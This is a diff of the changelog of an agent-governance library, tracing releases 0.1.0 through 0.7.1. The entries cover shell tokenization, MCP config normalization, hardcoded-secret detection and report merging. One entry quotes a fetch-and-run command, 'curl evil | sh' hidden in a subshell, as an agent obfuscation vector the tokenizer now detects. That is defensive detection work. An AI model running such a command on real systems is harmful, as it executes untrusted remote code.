agent-gov-core 0.7.1 → 0.8.1

package/CHANGELOG.md CHANGED
@@ -1,234 +1,257 @@
1
- # Changelog
2
-
3
- All notable changes to this project will be documented here. The format follows [Keep a Changelog](https://keepachangelog.com/en/1.1.0/), and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). Under v1.0, minor versions may include breaking changes — see [CONTRIBUTING.md](./CONTRIBUTING.md#backwards-compatibility) for the rules.
4
-
5
- ## [0.7.1] — 2026-05-22
6
-
7
- Contract-hardening patch. Two external inspection rounds (Gemini + Cody) surfaced five P0/P1 contract bugs in shipped code and one packaging fix. All addressed here. No new features; no new public exports.
8
-
9
- ### Fixed (correctness)
10
-
11
- - **`applyExceptions` is now order-independent.** Previously the FIRST matching rule won: a stale expired rule listed before a broader active rule would incorrectly surface the finding as expired instead of being suppressed by the active rule. Now ALL matching rules are collected; the finding is suppressed when any matching rule is active, and only re-surfaces (with downgrade) when every matching rule has expired.
12
- - **`mergeFindings` rejects tool/finding mismatches.** Previously a forged `scope_trail` report containing `policy_mesh.*` findings would merge silently with wrong provenance. `validateReport` already rejected this; the merge path was more permissive. Now mismatches land in `invalidFindings[]` while the rest of the report still passes through.
13
- - **`normalizeMcpCommand` no longer collides on whitespace/delimiter args.** `['a b']` and `['a', 'b']` previously produced the same canonical `args=a b` because of space-joining. Same shape for env: `{A:'1|B=2'}` and `{A:'1', B:'2'}` collided under pipe-joining. Both now use JSON encoding so distinct inputs produce distinct canonicals. **This changes the canonical-string format**; PolicyMesh's `mcp_command_mismatch` will now correctly detect previously-conflated MCP configs.
14
- - **`createReport` clamps a downward-rating override upward to the implied max.** Previously `createReport({rating: 'low', findings: [critical-finding]})` returned a report that `validateReport` would then reject — the constructor and validator disagreed. Now createReport's output always round-trips through validateReport. Upward overrides (rating > implied) are still honored.
15
- - **`applyExceptions` pathPrefix now normalizes Windows backslashes and requires segment boundaries.** A finding with `src\app.ts` (Windows) now matches a `src/` prefix; a prefix `src/app` no longer over-suppresses `src/application.ts` (the match must land on a `/` boundary or be the exact path).
16
-
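The order-independence and segment-boundary fixes above can be illustrated with a minimal sketch. This is not the library's implementation: `RuleSketch`, `matchesPathPrefix`, `isActive`, and `resolveOutcome` are hypothetical names, and the treatment of an unparseable `expires` as never-expiring follows the behavior described in the 0.7.0 test notes.

```typescript
// Illustrative sketch only; names and shapes are hypothetical,
// not the library's actual implementation.
interface RuleSketch {
  pathPrefix?: string;
  expires?: string; // date string; absent means the rule never expires
}

// Segment-aware prefix match after normalizing Windows backslashes.
function matchesPathPrefix(file: string, prefix: string): boolean {
  const path = file.replace(/\\/g, "/");
  const pre = prefix.replace(/\\/g, "/");
  if (path === pre) return true; // exact path
  // Otherwise the match must land on a "/" boundary.
  const boundary = pre.charAt(pre.length - 1) === "/" ? pre : pre + "/";
  return path.indexOf(boundary) === 0;
}

// Active when there is no expiry, an unparseable expiry, or a future expiry.
function isActive(rule: RuleSketch, now: number): boolean {
  if (rule.expires === undefined) return true;
  const t = Date.parse(rule.expires);
  return isNaN(t) || t > now;
}

type Outcome = "unmatched" | "suppressed" | "expired";

// Collect ALL matching rules first, then decide; rule order cannot matter.
function resolveOutcome(file: string, rules: RuleSketch[], now: number): Outcome {
  const matching = rules.filter(
    (r) => r.pathPrefix === undefined || matchesPathPrefix(file, r.pathPrefix)
  );
  if (matching.length === 0) return "unmatched";
  return matching.some((r) => isActive(r, now)) ? "suppressed" : "expired";
}
```

With a stale rule listed before an active one, `resolveOutcome` still returns `"suppressed"`, and a `src/app` prefix does not match `src/application.ts`.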
17
- ### Changed (visible to consumers)
18
-
19
- - **MCP canonical-string format**: `args` and `env` now serialize as JSON. Existing PolicyMesh test fixtures may need updates if they pin the exact canonical (most don't — they pin server-identity-equivalence). Golden tests in `test/golden.test.mjs` updated to the new format.
20
-
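To see why delimiter-joining collides and JSON encoding does not, here is a small sketch. The helper names and the exact `args=`/`env=` layout are assumptions for illustration; the real canonical string produced by `normalizeMcpCommand` may differ in detail.

```typescript
// Illustrative only: hypothetical helpers, not the library's canonical format.
type Env = { [key: string]: string };

// Old style: delimiter-joined, so delimiters inside values are ambiguous.
function joinArgs(args: string[]): string {
  return "args=" + args.join(" ");
}
function joinEnv(env: Env): string {
  return "env=" + Object.keys(env).sort().map((k) => k + "=" + env[k]).join("|");
}

// New style: JSON-encoded, so structure survives whatever the values contain.
function jsonArgs(args: string[]): string {
  return "args=" + JSON.stringify(args);
}
function jsonEnv(env: Env): string {
  // Sort keys so the encoding does not depend on insertion order.
  const pairs = Object.keys(env).sort().map((k) => [k, env[k]]);
  return "env=" + JSON.stringify(pairs);
}

console.log(joinArgs(["a b"]) === joinArgs(["a", "b"])); // true (collision)
console.log(jsonArgs(["a b"]) === jsonArgs(["a", "b"])); // false
console.log(joinEnv({ A: "1|B=2" }) === joinEnv({ A: "1", B: "2" })); // true (collision)
console.log(jsonEnv({ A: "1|B=2" }) === jsonEnv({ A: "1", B: "2" })); // false
```

Fixtures that pin the exact canonical string are the ones that would need regenerating; fixtures that only compare two configs for equivalence should be unaffected.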
21
- ### Packaging
22
- - `docs/` directory is now included in the npm tarball. The README's link to `docs/INTEROP-OTEL.md` no longer 404s on the npm landing page.
23
-
24
- ### Cleanup
25
- - `candidateTool` in `merge.ts` now delegates to `isToolKind` from `finding.ts` instead of carrying a hardcoded tool-list regex. Removes the fourth lockstep duplication of the ToolKind enum.
26
-
27
- ### Tests
28
- - 230 total, up from 220. 10 new regression cases: order-independent exception application, all-expired downgrade chain, Windows-backslash path normalization, segment-aware prefix boundary, mergeFindings tool-mismatch rejection, MCP args whitespace collision, MCP env delimiter collision, MCP env order-independence under JSON encoding, createReport rating clamp, createReport round-trip-validates contract.
29
-
30
- ### Skipped vs Cursor inspection
31
- - Gemini #3 (secret-pattern boundary anchors): proposed fix didn't actually fix the example given (`my-transaction-id-AIza<35>` has `-` as boundary character, so a boundary anchor still allows the match). Held for further design.
32
- - Gemini #4 (hex token vs `GITHUB_SHA`): operationally rare given current consumer scanning paths; document-only follow-up.
33
- - Cursor's README/package.json description / CONTRIBUTING module list refresh: pending follow-up doc PR.
34
-
35
- ## [0.7.0] - 2026-05-22
36
-
37
- **The pre-v1.0 consolidation release.** Bundles everything that was queued for v0.6.0 (report envelope + merge layer + OTel GenAI interop) plus two universal detectors promoted from consumer repos: `matchSecret` (from PolicyMesh) and `applyExceptions` (unifying PolicyMesh's `subject` and TaskBound's `allow_paths` shapes).
38
-
39
- No breaking changes to the v0.5.0 surface — additive minor bump. One npm publish covers all of it.
40
-
41
- This is the last release before v1.0 freeze. The remaining gate is consumer-side: at least one tool wiring `generateWorkflowSummary` end-to-end, then v1.0 with semver guarantees on the contract pinned by the golden tests.
42
-
43
- ### Added — Report envelope
44
- - `Report` interface — canonical multi-tool envelope with `schemaVersion`, `tool`, `rating`, optional `toolVersion`/`runId`/`conversationId`/`baseRef`/`headRef`, `findings: Finding[]`, and tool-specific extension `data`.
45
- - `Report.conversationId` (optional): agent session / PR review / thread identifier. Matches OpenTelemetry's `gen_ai.conversation.id` semantic convention so a consumer can pass the same string into both governance reports and OTel traces, then correlate them downstream.
46
- - `REPORT_SCHEMA_VERSION` const (`'1.0'`).
47
- - `schemas/report.schema.json` — JSON schema for the envelope, exposed via the package's `./schemas/report.schema.json` export.
48
- - `createReport({tool, findings, ...})`: convenience constructor; sets `schemaVersion` and computes `rating` from max finding severity (unless overridden).
49
- - `maxSeverity(findings)` — helper that returns `'none' | Severity` across a finding list.
50
- - `validateReport(value)` — strict envelope check that also validates each contained finding and flags cross-field inconsistencies (e.g. rating below implied max).
51
-
52
- ### Added — Merge layer
53
- - `mergeFindings(reports, opts?)` combines N tool reports into one normalized `MergedReport`:
54
- - Deduplicates by `Finding.fingerprint`. Default policy: keep highest severity; `duplicatePolicy: 'first'` keeps the first occurrence.
55
- - Optional severity `threshold` drops findings below the requested level into a counted `droppedBelowThreshold` field.
56
-   - Aggregates rating from the surviving findings, not source ratings, so threshold filtering correctly demotes the merged rating.
57
- - Sorts findings by severity, highest first.
58
- - Propagates `conversationId` to the merged report iff every source agrees. Cross-conversation mixing leaves the field intentionally empty so a meta-reviewer can detect misuse.
59
- - **Never silently drops bad data**: malformed envelopes go to `invalidReports[]`, individual malformed findings go to `invalidFindings[]`. A single bad finding in a tool's report doesn't poison the rest of that report.
60
- - `MergeOptions`, `MergeSource` (with optional `conversationId`), `MergedReport` (with optional `conversationId`), `InvalidReport`, `InvalidFinding` types.
61
-
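The merge rules listed above (dedupe by fingerprint keeping the highest severity, sort highest first, derive the rating from survivors, propagate `conversationId` only on full agreement) can be sketched as follows. The type and function names are hypothetical, thresholds and invalid-data handling are omitted, and how the real `mergeFindings` treats sources that lack a `conversationId` is an assumption here.

```typescript
// Illustrative sketch; not the library's mergeFindings implementation.
type SeveritySketch = "low" | "medium" | "high" | "critical";
interface FindingSketch { fingerprint: string; severity: SeveritySketch; message: string; }
interface SourceSketch { tool: string; conversationId?: string; findings: FindingSketch[]; }

// Severity ranks as documented for rankSeverity in the README fix below.
const RANK: { [s: string]: number } = { low: 1, medium: 2, high: 3, critical: 4 };

function mergeSketch(reports: SourceSketch[]) {
  // Null-prototype object so arbitrary fingerprint strings are safe keys.
  const byFingerprint: { [fp: string]: FindingSketch } = Object.create(null);
  for (const report of reports) {
    for (const f of report.findings) {
      const kept = byFingerprint[f.fingerprint];
      // Default duplicate policy: keep the highest severity.
      if (kept === undefined || RANK[f.severity] > RANK[kept.severity]) {
        byFingerprint[f.fingerprint] = f;
      }
    }
  }
  const findings = Object.keys(byFingerprint)
    .map((fp) => byFingerprint[fp])
    .sort((a, b) => RANK[b.severity] - RANK[a.severity]);
  // Rating comes from surviving findings, not from the source ratings.
  const rating: SeveritySketch | "none" = findings.length > 0 ? findings[0].severity : "none";
  // Assumption: propagate only when every source carries the same id.
  const ids = reports.map((r) => r.conversationId);
  const agree = ids.length > 0 && ids[0] !== undefined && ids.every((id) => id === ids[0]);
  return { findings, rating, conversationId: agree ? ids[0] : undefined };
}
```

Mixing reports from two different conversations leaves `conversationId` undefined in this sketch, which matches the stated intent of letting a meta-reviewer detect misuse.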
62
- ### Added - OpenTelemetry GenAI interop
63
- - `docs/INTEROP-OTEL.md` — explicit cross-walk between `agent-gov-core` types and OTel's [`gen_ai.*` semantic conventions](https://opentelemetry.io/docs/specs/semconv/gen-ai/). Maps `Report.conversationId` ↔ `gen_ai.conversation.id`, documents why we adopt one bridge field and not the whole namespace, and shows a paired-emission pattern for orgs running OTel-instrumented agents alongside governance tools.
64
-
65
- ### Added — Hardcoded secret detection (promoted from PolicyMesh)
66
- - `matchSecret(value, options?)` scans a string for provider-prefix credentials and returns `{ provider }` (never the literal credential). Built-in patterns: Anthropic, OpenAI (sk- + sk-proj-), GitHub (PAT + classic), Slack, AWS, Google, GitLab, npm, Docker, Stripe, plus a length-restricted hex token pattern gated to env/header context to avoid commit-SHA false positives.
67
- - `MatchSecretOptions.envOrHeaderContext` — opt-in flag for the hex token pattern.
68
- - `SECRET_PATTERNS` — exported read-only constant table; golden-tested so additions are non-breaking but removals require a major bump.
69
- - `SecretMatch` type.
70
- - `env:VAR` references are never flagged (Codex notation for env-var lookups).
71
-
72
- ### Added - Exception baselines (promoted + unified from PolicyMesh + TaskBound)
73
- - `applyExceptions(findings, exceptions, now?)` — suppress (or downgrade-on-expiry) findings matched by `kind` + optional `salientKey` + optional `pathPrefix`. PolicyMesh's `.policymesh-exceptions.json` shape and TaskBound's `.taskbound.yml` `ignore_kinds`/`allow_paths` shape both map cleanly onto this unified primitive.
74
- - Expired exceptions don't silently drop — they re-surface with severity downgraded to `'low'` and an `[EXPIRED WHITELIST]` message prefix so stale baselines stay visible. Reason text propagates to `finding.data.exceptionReason`.
75
- - `validateException(value)`: runtime check for well-formed exception entries.
76
- - `Exception`, `ApplyExceptionsResult` types.
77
-
78
- ### Tests
79
- - 57 new cases. 220 total (up from 163). Breakdown:
80
- - Report: 17 (schemaVersion pinning, rating derivation, explicit-rating override, validateReport accepting/rejecting envelope-level errors, finding-tool consistency, unknown property rejection, downgrade-allowed/upgrade-flagged rating consistency, conversationId passthrough + type check).
81
- - Merge: 14 (empty input, cross-tool combine, fingerprint dedup with `highest_severity` and `first` policies, salientKey-disambiguated findings stay separate, threshold filtering, malformed report invalidReports, malformed finding invalidFindings, severity-sorted output, aggregate-rating-reflects-survivors, source provenance, conversationId agreement/disagreement/partial-coverage propagation).
82
- - Secrets: 11 (each provider class detected, env: refs never flagged, empty/short input ignored, hex token gated to env/header context, non-hex 40-char string rejected, never-leak-literal contract, golden-pinned `SECRET_PATTERNS` provider set).
83
- - Exceptions: 15 (empty input identity, suppress by kind/salientKey/pathPrefix, perpetual-active when no expires, expired surfacing with downgrade/prefix/reason, non-matching kind/salientKey passthrough, pathPrefix without location.file safely non-matches, malformed expires treated as never-expires, future expires stays active, validateException accept/reject paths).
84
-
85
- ## [0.5.0] - 2026-05-22
86
-
87
- Three additive features completing the queue from Gemini's third inspection round, plus five correctness fixes from a deep code-level inspection done before publish. No breaking changes — existing exports and call signatures unchanged.
88
-
89
- Minor bump (not patch) because the surface grew: three new top-level exports.
90
-
91
- ### Fixed (pre-publish inspection sweep: Gemini + Cody)
92
- - `tokenizeShell` no longer splits on `&` inside file-descriptor redirections (`2>&1`, `>&2`, `<&3`). The single-`&` separator rule now checks the preceding non-whitespace character.
93
- - `tokenizeShellDeep` no longer false-positives on `bash -c` text inside double-quoted echo arguments. Previously a whole-string regex matched `bash -c` anywhere, including data being printed. Detection now runs inside the quote-aware walk and only fires at command boundaries outside quoted regions.
94
- - `updateMultilineStringState` (TOML locator) now tracks backslash escapes inside basic multi-line strings (`"""…"""`). An escaped `\"""` inside the value no longer prematurely terminates the string-state walker, which had caused decoy keys to match. Literal strings (`'''…'''`) intentionally don't track escapes per TOML spec.
95
- - `lineOfTomlKey` now finds dotted keys nested under any prefix table, not just at file root. `[a]\nb.c = 42` is now reachable as `a.b.c`. Same shape as the v0.4.4 top-level fix, generalized.
96
- - `lineOfTomlKey` now matches spaced dotted keys (`a . b . c = 1`) which `parseToml` had always accepted but the locator's compact-only regex couldn't find. Pattern now builds from individual segments joined by `\s*\.\s*`.
97
- - TOML parser correctly handles a line-ending backslash followed by trailing inline whitespace before the newline. Per spec, `"""line\ \nnext"""` strips the newline and trims leading whitespace on the next line. Previously the trailing spaces caused the backslash to be treated as a regular escape (which silently kept everything literally rather than throwing, but still wasn't spec-compliant).
98
- - `normalizeMcpCommand` now treats common boolean long-flags (`--verbose`, `--quiet`, `--debug`, `--help`, `--version`, `--force`, `--dry-run`, `--no-cache`, `--no-color`, `--no-progress`, `--json`, plus short forms `-v -V -q -h -d`) as standalone instead of greedily pairing them with the next positional. Configs with `--verbose pkg` no longer normalize differently depending on flag order.
99
- - `normalizeExecutable` (MCP) now lowercases Windows-shaped executable names (those with `\` separators or `.cmd`/`.exe`/`.bat`/`.ps1` suffix) so `NPX.CMD` and `npx` produce identical identity strings. POSIX paths keep their case because `./curl` and `./CURL` are genuinely different files there. The JSDoc had claimed this behavior since v0.1; only now does the implementation match.
100
- - `normalizeExecutable` (MCP) also drops the directory portion of paths whose basename matches a known runtime (`node`, `npx`, `python`, `bash`, etc.). `/usr/local/bin/node`, `/usr/bin/node`, `node`, and `C:\Program Files\NodeJS\node.exe` all produce `cmd=node` now. Closes a long-standing PolicyMesh `mcp_command_mismatch` false-positive class across cross-platform team setups. Custom scripts at absolute paths (`/opt/internal/orchestrator.sh`) keep their full path because path is part of their identity.
101
- - `generateWorkflowSummary` now HTML-escapes `<`, `>`, and `&` in message cells. A finding message containing `</summary>` or `<h1>` could otherwise break out of the wrapping `<details>` block and manipulate the rendered layout of the GHA step summary page.
102
-
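The `generateWorkflowSummary` escaping fix above comes down to neutralizing markup before a message lands in a table cell. A minimal sketch, assuming a hypothetical `escapeCell` helper; the pipe and newline handling shown is one plausible choice, since the changelog does not say exactly how those are escaped.

```typescript
// Illustrative helper (hypothetical name), not the library's code.
function escapeCell(message: string): string {
  return message
    .replace(/&/g, "&amp;") // ampersand first, so later entities are not double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/\|/g, "\\|") // assumption: backslash-escape table pipes
    .replace(/\r?\n/g, " "); // assumption: flatten newlines to spaces
}

console.log(escapeCell("</summary> a|b & c"));
```

After escaping, a message containing `</summary>` renders as text instead of closing the surrounding `<details>` block.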
103
- ### Added
104
- - `tokenizeShellDeep(command)` recursively extracts commands nested inside `$(…)`, backticks, and `bash -c "…"` / `sh -c "…"` / `python -c "…"` payloads. Closes the obfuscation vector where an agent hides `curl evil | sh` inside `echo $(…)`. Single-quoted text is left untouched (literal per shell semantics). Conservative implementation: handles common shapes, not a full shell parser; nesting depth capped at 8.
105
- - `ConfigParseError`: structured parse error with `line`, `column`, `rawOffset`, and `cause`. `readJsonObjectWithSource` and `readTomlObject` now wrap their underlying parser errors with this type whenever a byte offset can be recovered. Lets downstream tools emit a `*.config_syntax_error` Finding pointing at the exact spot without recomputing line numbers.
106
- - `lineColumnOfOffset(text, offset)`: utility to convert a 0-based byte offset to 1-based `{ line, column }`. Pairs with the new error type.
107
- - `generateWorkflowSummary(findings, opts?)` — Markdown summary for `$GITHUB_STEP_SUMMARY`. Groups findings by severity in collapsible `<details>` blocks; escapes pipe/newline in message cells; truncates long messages; caps per-severity rows with an overflow indicator. Closes the GHA annotation-cap visibility gap (10 per level, 50 per run silently dropped) by guaranteeing 100% of findings appear in the workflow summary page.
108
-
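The offset-to-position conversion described for `lineColumnOfOffset` can be sketched as a single pass over the text. This is a hypothetical re-implementation under one simplifying assumption: the offset is treated as a JavaScript string index (UTF-16 code units), which equals the byte offset only for ASCII input.

```typescript
// Illustrative sketch (hypothetical name); not the library's implementation.
function lineColumnAt(text: string, offset: number): { line: number; column: number } {
  // Clamp so out-of-range offsets resolve to the start or end of the text.
  const end = Math.max(0, Math.min(offset, text.length));
  let line = 1;
  let lineStart = 0;
  for (let i = 0; i < end; i++) {
    if (text.charCodeAt(i) === 10) { // "\n" starts a new line
      line++;
      lineStart = i + 1;
    }
  }
  return { line, column: end - lineStart + 1 };
}

const pos = lineColumnAt("a = 1\nb = [\n", 6);
console.log(pos.line, pos.column); // 2 1
```

A wrapper error type could call a helper like this once, at construction time, so downstream tools read `line` and `column` directly.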
109
- ### Changed
110
- - TOML parser semantic errors (`Duplicate key`, `Duplicate key in inline table`, `Duplicate table definition`, `Cannot redefine array-of-tables …`) now include `at offset N` in the message so `readTomlObject` can resolve them to a line.
111
-
112
- ### Tests
113
- - 55 new cases. 163 total (up from 108). Coverage:
114
- - tokenizeShellDeep: subshells, backticks, `-c` payloads, single-quote literal handling, nested subshells, no-op pass-through, integration with `getCommandHead`. (9 cases)
115
- - parse-error: offset line/column conversion (5 edge cases), structured wrap on JSON and TOML, `parseToml` direct call unchanged, `cause` preservation. (10 cases)
116
- - generateWorkflowSummary: empty findings, severity ordering, totals, pipe/newline escape, truncation, per-group cap with overflow, missing location, HTML escape, ampersand escape. (9 cases)
117
- - Inspection regressions: 14 cases covering `2>&1`, escaped `\"""`, table-nested dotted keys, line-ending backslash, known-boolean flags, quoted `bash -c` data, Windows case-folding, POSIX case preserved, spaced dotted keys, path de-noise across platforms, custom-script identity preservation.
118
-   - **Golden compatibility tests** (`test/golden.test.mjs`): 11 cases pinning specific fingerprint hashes and `normalizeMcpCommand` canonical strings. These are the contract: breaking them requires a major bump and migration plan.
119
-
120
- ## [0.4.4] - 2026-05-22
121
-
122
- Cody-led inspection (third reviewer, third round) caught five issues, two of them P0 regressions I introduced in my own v0.4.2 / v0.4.3 fixes. All five fixed here.
123
-
124
- ### Fixed
125
- - **P0**: `fingerprintFinding` no longer appends an empty-string segment for findings without `salientKey`. v0.4.3 added `?? ''` which silently changed the hash for every existing finding and broke the v0.4.2 → v0.4.3 backwards-compat claim in my own changelog. Pinned by a new test that asserts the specific v0.4.2-form hash for a salient-less finding.
126
- - **P0**: TOML parser no longer rejects valid subtable headers repeated under separate array-of-tables entries. `[[fruits]] [fruits.physical] [[fruits]] [fruits.physical]` now parses correctly — each `[[fruits]]` entry resets the "already defined" status of subtable paths under that AOT. My v0.4.2 `definedTables` guard was global per-file when it should have been scoped to the current AOT entry.
127
- - `lineOfJsonStringValue` no longer matches occurrences in key position. Searching for value `"command"` in `{"command":"npx", "args":["command"]}` now returns the array-element line, not the key. Negative lookahead `(?!\s*:)` after the closing quote.
128
- - `lineOfTomlKey` now finds top-level dotted keys. `lineOfTomlKey('a.b.c = 1', 'a.b.c')` returns 1 instead of 0; the dotted-key check was gated behind `inTargetTable`, which is false at file root.
129
-
130
- ### Changed
131
- - `package-lock.json` resynced to 0.4.4. Was drifting at 0.4.2 because previous releases bumped `package.json` without running `npm install` to refresh the lockfile.
132
-
133
- ### Tests
134
- - 6 new cases: pinned v0.4.2-form fingerprint hash, JSON value-vs-key disambiguation (+ colon-in-value sanity check), top-level dotted TOML keys, AOT subtable repeat across entries (+ within-entry duplicate still rejected). 108 total (up from 102).
135
-
136
- ## [0.4.3] — 2026-05-22
137
-
138
- Third Gemini-inspection round caught one confirmed bug, one disguised-as-suggestion bug, and three feature opportunities. Both bugs fixed here; the feature work is queued for v0.5.0.
139
-
140
- ### Added
141
- - `Finding.salientKey?: string`: optional discriminator that participates in the fingerprint hash. Set this when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on the same line, two MCP servers in the same JSON object). Without it, the meta-reviewer would dedupe them into one. Use stable values only (package name, server name, rule id), not timestamps or counters.
142
- - `CreateFindingSpec.salientKey` — pass-through to the new field.
143
- - Schema gained `salientKey` under properties (still optional, schema's `additionalProperties: false` updated to permit it).
144
-
145
- ### Fixed
146
- - `fingerprintFinding` now includes `salientKey` in the hash. Two distinct findings of the same kind on the same line with different `salientKey` values now produce different fingerprints. Backwards-compatible: findings without `salientKey` still produce stable, identical fingerprints to v0.4.2 for the (kind, file, line, column) tuple.
147
- - `lineOfTomlKey` now tracks multi-line basic (`"""`) and literal (`'''`) string state and skips key matching on lines that fall inside one. Previously a decoy key inside a multi-line string value could be matched as if it were a real assignment — confirmed bug with sharper reproduction than Gemini's first-round example.
148
-
149
- ### Tests
150
- - 7 new regression cases. 102 total (up from 95). Covers salientKey discrimination, backwards-compat for fingerprints without salientKey, validateFinding type check, decoy-in-`"""`, decoy-in-`'''`, single-line `"""..."""` (must NOT enter multiline state), and a plain-TOML sanity check that the fix doesn't over-correct.
151
-
152
- ## [0.4.2] — 2026-05-22
153
-
154
- External code review (Gemini, second pass) caught four correctness bugs and one source-cleanliness issue. All five fixed here.
155
-
156
- ### Fixed
157
- - `lineOfJsonKey` and `lineOfJsonStringValue` now JSON-encode the search input before building the regex. A caller passing the *decoded* value (e.g. `C:\Temp` from a Windows-path field) now correctly locates the JSON source bytes (`"C:\\Temp"`) instead of returning 0. Affects CapabilityEcho's `package-scripts` detector for scripts containing quotes/backslashes.
158
- - `lineOfJsonKey` and `lineOfJsonStringValue` now scan over `stripJsonComments(text)` instead of raw text. A commented-out `"command": "fake"` no longer shadows the real key on a later line. The strip is position-preserving so returned line numbers still reference the original source.
159
- - `getCommandHead` now strips wrapper flags (`sudo -E`, `env -i`) after recognizing a wrapper, so `sudo -E curl ...` returns `curl` instead of `-E`. SessionTrail/CapabilityEcho shell detectors no longer miss wrapped curl/wget invocations. Known limitation: short flags taking a value (`sudo -u user curl`) still misclassify as the value — documented and pinned by test.
160
- - TOML parser now rejects a standard table header (`[items]`) that follows an array-of-tables header (`[[items]]`) with a `Cannot redefine array-of-tables` error. Previously the standard table silently descended into the array's last entry, letting writes leak into `items[0]`. Spec compliance fix.
161
- - TOML inline-table parser now rejects duplicate keys with `Duplicate key in inline table: ...`. Previously `server = { host = "a", host = "b" }` parsed as `{ host: "b" }` — the standard-table guard wasn't mirrored on inline tables. Spec compliance fix.
162
-
163
- ### Changed
164
- - Source cleanup: the two `keys.join` calls in `src/toml.ts` now use a named `PATH_KEY_SEPARATOR = ''` constant instead of literal NUL bytes embedded in the source. Same runtime behavior (NUL as the delimiter, which is illegal in TOML keys so collision-proof), but `rg`/`grep` no longer treat the file as binary and `file(1)` reports it as proper text.
165
- - README: `rankSeverity` doc corrected; it said `none=0…critical=4`, but the actual ranks are `low=1, medium=2, high=3, critical=4`. The schema has no `none` severity.
166
- - README: `normalizeMcpCommand` signature and behavior description corrected — was listing a non-existent `serverUrl` field and claiming "resolves npx/uvx invocations" which doesn't happen. Now accurately lists: drops neutral confirm flags, strips Windows executable suffixes, sorts non-neutral flags alphabetically, preserves positional argument order, includes env + cwd in identity.
167
-
168
- ### Added
169
- - 7 new regression tests: encoded-value lookup, commented-out shadow, wrapper-flag unwrap (+ edge-case pin), AOT-vs-table mixing, inline-table duplicate keys.
170
-
171
- ## [0.4.1] — 2026-05-22
172
-
173
- ### Fixed
174
- - `fingerprintFinding` now normalizes Windows-style backslash paths to forward slashes before hashing. A finding emitted on Windows and the same finding emitted in Linux CI now collapse to the same fingerprint — previously they'd diverge and break cross-platform dedupe. Caught by external code review.
175
- - `normalizeMcpCommand` now preserves the relative order of positional arguments that appear after a flag. Previously `['--flag', 'x', 'a', 'b']` and `['--flag', 'x', 'b', 'a']` collapsed to the same canonical identity because the post-flag positional keys were co-sorted with flag pairs. PolicyMesh's `mcp_command_mismatch` would under-report under this bug. Caught by external code review.
176
-
177
- ### Changed
178
- - `stripJsonComments` and `stripTrailingCommas` no longer carry the dead `"'"` (single-quote) state in their string tracker — JSON strings are double-quoted only. Pure type/comment cleanup, no behavior change. Caught by external code review.
179
-
180
- ### Added
181
- - Regression tests for both fixes:
182
- - `fingerprintFinding`: identical fingerprint across Windows and POSIX path separators.
183
- - `normalizeMcpCommand`: differing post-flag positional order produces different identities; flag order independence preserved.
184
- - `CHANGELOG.md` is now shipped in the npm tarball.
185
-
186
- ### Internal
187
- - `package.json` `files` allow-list trimmed to exclude `.js.map` / `.d.ts.map` sourcemaps from the published tarball. The maps referenced `src/*.ts` source files that aren't shipped, so they were dead links anyway. Tarball is ~27% smaller (32.4 kB to ~23.6 kB).
188
-
189
- ## [0.4.0] - 2026-05-22
190
-
191
- ### Added
192
- - `JsonObjectWithSource.value`: new field that mirrors `json`, populated identically. Use this in new code; `json` is kept as a populated alias.
193
- - `TomlObjectWithSource.value` — same pattern for the TOML reader.
194
- - `lineOfTomlKey(text, dottedKey, scope?)`: optional `scope: ByteRange` parameter for parity with `lineOfJsonKey` and `lineOfJsonStringValue`. Useful when an outer locator has already pinned a parent table's range and you want to find a leaf inside it without false matches from a sibling table.
195
-
196
- ### Deprecated
197
- - `JsonObjectWithSource.json`: prefer `value`. Will be removed in a future major version.
197
- - `TomlObjectWithSource.toml`: prefer `value`. Will be removed in a future major version.
199
-
200
- ## [0.3.1] — 2026-05-22
201
-
202
- ### Added
203
- - Secondary entry point `agent-gov-core/test-utils` with fixtures the suite repos all hand-rolled:
204
-   - `writeFiles(dir, fileMap)`: write a path-to-content map, creating parent directories.
204
-   - `makeGitRepo({initialFiles?, initialMessage?})` returns `{repo, commit, head, git, cleanup}`: a temp git repo on branch `main` with placeholder identity. `commit()` applies files and commits, returning the new SHA.
205
-   - `makeOldNewFixture({old, new})` returns `{old, new, cleanup}`: two sibling temp directories for diff-mode CLI tests.
207
-
208
- ## [0.3.0] — 2026-05-22
209
-
210
- ### Added
211
- - `createFinding({tool, name, severity, message, ...})` — convenience constructor that calls `kind()` and `fingerprintFinding()` for you.
212
- - `fingerprintFinding(finding)`: 16-char hex hash of `(kind, file, line, column)`. Stable across runs and message rewordings, so a meta-reviewer can dedupe.
213
- - `validateFinding(value)` — runtime check against `schemas/finding.schema.json`, returns `{ ok, errors[] }`.
214
- - `CreateFindingSpec` and `FindingValidationResult` types.
215
- - JSDoc `@example` blocks on `tokenizeShell`, `getCommandHead`, `normalizeMcpCommand`, `emitFindingAnnotation`.
216
- - JSDoc on `ToolKind` explaining the schema/runtime lockstep contract.
217
-
218
- ## [0.2.0] — earlier
219
-
220
- ### Added
221
- - `kind(tool, name)`: typed helper that builds `<tool>.<slug>` strings.
222
- - `isNamespacedKind(value)`: runtime guard matching the JSON schema's `kind` pattern.
223
-
224
- ### Changed
225
- - Schema regex tightened to require namespaced kinds: `^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$`.
226
-
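A runtime guard over the tightened pattern might look like the sketch below. The regex is copied from the entry above; the function name is hypothetical and is not claimed to match how `isNamespacedKind` is implemented.

```typescript
// Pattern taken verbatim from the schema change above.
const KIND_PATTERN =
  /^(scope_trail|policy_mesh|capability_echo|task_bound|session_trail)\.[a-z0-9_]+$/;

// Hypothetical guard, shown only to illustrate what the pattern accepts.
function isNamespacedKindSketch(value: unknown): value is string {
  return typeof value === "string" && KIND_PATTERN.test(value);
}

console.log(isNamespacedKindSketch("policy_mesh.mcp_command_mismatch")); // true
console.log(isNamespacedKindSketch("mcp_command_mismatch")); // false
console.log(isNamespacedKindSketch("policy_mesh.Bad-Name")); // false
```

Because the pattern is anchored at both ends and has no global flag, repeated `test` calls carry no state between inputs.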
227
- ## [0.1.2] - earlier
228
-
229
- ### Changed
230
- - `normalizeMcpCommand` drops neutral confirm flags (`-y`, `--yes`) before canonicalization, so `npx -y foo` and `npx foo` produce the same identity.
231
-
232
- ## [0.1.0] — earlier
233
-
234
- Initial release. Finding schema, JSONC/TOML readers, line locators, MCP normalization, shell tokenization, and GitHub Action helpers.
1
+ # Changelog
2
+
3
